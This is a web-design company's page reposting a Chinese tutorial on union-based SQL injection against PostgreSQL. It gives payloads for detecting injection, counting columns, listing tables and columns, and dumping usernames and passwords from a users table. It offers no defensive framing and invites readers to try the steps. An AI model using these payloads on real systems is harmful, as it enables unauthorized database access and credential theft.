网创优客建站品牌官网
为成都网站建设公司企业提供高品质网站建设
热线:028-86922220
成都专业网站建设公司

定制建站费用3500元

符合中小企业对网站设计、功能常规化式的企业展示型网站建设

成都品牌网站建设

品牌网站建设费用6000元

本套餐主要针对企业品牌型网站、中高端设计、前端互动体验...

成都商城网站建设

商城网站建设费用8000元

商城网站建设因基本功能的需求不同费用上面也有很大的差别...

成都微信网站建设

手机微信网站建站3000元

手机微信网站开发、微信官网、微信商城网站...

建站知识

当前位置:首页 > 建站知识

postgreasql数据库注入的过程

本篇内容主要讲解“postgreasql数据库注入的过程”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“postgreasql数据库注入的过程”吧!

成都创新互联公司-云计算及IDC服务提供商,涵盖公有云、IDC机房租用、雅安电信机房、等保安全、私有云建设等企业级互联网基础服务,沟通电话:13518219792

一、判断是否存在注入

and 1=2 返回错误

and 1=1 返回正常,存在注入

and 1::int=1 返回正常说明是postgresql数据库

二、判断字段数量

order by 5 返回错误

postgreasql数据库注入的过程

order by 4 返回正常说明,有四列

postgreasql数据库注入的过程

三、联合查询

union select '1','2','3','4' 可以看出2/3号位置显示

postgreasql数据库注入的过程

四、获取当前数据库

union select '1',current_database(),'3','4'

postgreasql数据库注入的过程

五、获取第一个表

union select '1',relname,'3','4' from  pg_stat_user_tables limit 1 offset 0

postgreasql数据库注入的过程

获取第二个表

union select '1',relname,relname,'4' from  pg_stat_user_tables limit 1 offset 1

六、获取第一个字段

union select '1',column_name,'3','4' from information_schema.columns where table_name='reg_users' limit 1 offset 0

postgreasql数据库注入的过程

获取第二个字段

union select '1',column_name,'3','4' from information_schema.columns where table_name='reg_users' limit 1 offset 1

七、获取字段内容

union select '1',''||name||','||password||'','3','4' from  reg_users

postgreasql数据库注入的过程

到此,相信大家对“postgreasql数据库注入的过程”有了更深的了解,不妨来实际操作一番吧!这里是创新互联网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!


当前标题:postgreasql数据库注入的过程
文章分享:http://bjjierui.cn/article/pdgeoh.html

其他资讯